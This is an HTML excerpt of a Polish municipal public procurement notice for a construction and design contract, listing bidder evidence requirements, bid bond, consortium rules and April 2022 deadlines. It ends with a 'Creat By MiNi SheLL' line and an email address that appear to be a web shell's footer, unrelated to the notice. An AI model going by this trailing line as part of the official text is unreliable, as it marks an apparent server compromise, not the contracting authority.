<span class="normal">1) W celu potwierdzenia<br/>braku podstaw wykluczenia wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego, Zamawiający żąda<br/>następujących podmiotowych środków dowodowych :<br/>a) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy, wystawionych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji,<br/>b) oświadczenia o braku przynależności do grupy kapitałowej ( wg załącznika Nr 3 ).<br/>Zamawiający żąda od wykonawcy, który na potwierdzenie spełniania warunków udziału w postępowaniu, polega na zdolnościach<br/>lub sytuacji innych podmiotów, przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w pkt. 1 ppkt. 1 lit. a) i<br/>b).<br/>c) oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ustawy Prawo zamówień<br/>publicznych</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu<br/>potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej,<br/>sytuacji finansowej, Zamawiający żąda następujących podmiotowych środków dowodowych :<br/>a) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 8 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te<br/>zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane<br/>zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne<br/>odpowiednie dokumenty ( wg załącznika Nr 4 ),<br/>b) wykazu wykonanych usług, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat<br/>przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia<br/>działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których<br/>usługi zostały wykonane, oraz załączenie dowodów określających czy te usługi zostały wykonane lub<br/>są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na<br/>rzecz którego dostawy były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane,<br/>a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest<br/>w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal<br/>wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3<br/>miesiące przed upływem terminu składania ofert albo wniosków<br/>o dopuszczenie do udziału w postępowaniu (wzór stanowi załącznik Nr 4 do SWZ ),<br/>c) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami ( wg załącznika Nr 5 ),<br/>d) informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków<br/>finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem.<br/>e) dokument potwierdzający ,że wykonawca jest ubezpieczony od OC w zakresie prowadzonej działalności związanej z<br/>przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej ubezpieczenia,</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Formularz ofertowy<br/>2) Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w<br/>postępowaniu<br/>3) Pełnomocnictwo<br/>4) Zobowiązanie podmiotu<br/>5) Wadium -<br/>6) Zastrzeżenie tajemnicy przedsiębiorstwa<br/>7) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają do oferty oświadczenie<br/>8) klauzula informacyjna RODO Urząd Marszałkowski <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.2.) Oferty wariantowe wraz ze złożeniem ofert podstawowej albo zamiast oferty podstawowej: <span class="normal"> dopuszcza zamiast oferty podstawowej</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 50.000,00 zł <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że:1) wspólnie<br/>spełniają warunki udziału w postępowaniu,2) w stosunku do żadnego z nich nie zachodzi<br/>jakakolwiek podstawa do wykluczenia z postępowania na podstawie art. 108 ust. 1 oraz art. 109<br/>ust. 1 pkt. 4 ustawy Pzp,3) ponoszą solidarną odpowiedzialność za niewykonanie lub<br/>nienależyte<br/>wykonanie zobowiązania,4) muszą ustanowić pełnomocnika wykonawców występujących<br/>wspólnie do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia. Pełnomocnictwo<br/>musi mieć formę pisemną lub kopię potwierdzona przez notariusza,5) przed zawarciem umowy<br/>o niniejsze zamówienie publiczne, jeżeli oferta konsorcjum zostanie wybrana jako<br/>najkorzystniejsza, Zamawiający wezwie do przedstawienia umowy regulującej współpracę tych<br/>wykonawców.6) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mają obowiązek<br/>dołączyć do oferty oświadczenie, z którego będzie wynikać, które roboty budowlane wykonają<br/>poszczególni wykonawcy.7) Przepisy dotyczące wykonawcy stosuje się odpowiednio do<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> warunki zmian określone zostały w dokumentach zamówienia SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-28 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://glogow-um.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-28 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-05-27</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.Wykonanie całego przedmiotu zamówienia – w terminie 15 miesięcy licząc od dnia zawarcia umowy lecz nie później niż<br/>do dnia 17.08.2023 r. wraz uzyskaniem ostatecznego pozwolenia na użytkowanie/ skutecznego zgłoszenia zakończenia<br/>robót z zastrzeżeniem, że wykonanie kompletnej dokumentacji projektowo-kosztorysowej wraz z uzyskaniem prawomocnych<br/>decyzji administracyjnych umożliwiających realizację przedmiotu zamówienia (pozwolenie na budowę) – do dnia<br/>14.10.2022r.<br/>2. W br. roku budżetowym Zamawiający posiada na realizację zadania zabezpieczenie finansowe w kwocie 560.108,00 zł.<br/>Pozostałe płatności za zrealizowany przedmiot zamówienia nastąpią w ramach zabezpieczonych środków dla tego zadania<br/>w WPF na 2023r.<br/><br/>3. Informacje dot. warunków oferty wariantowej opisano w zmianie SWZ z dnia 12.04.2022r. zamieszczone na stronie prowadzonego postępowania.

Creat By MiNi SheLL
Email: jattceo@gmail.com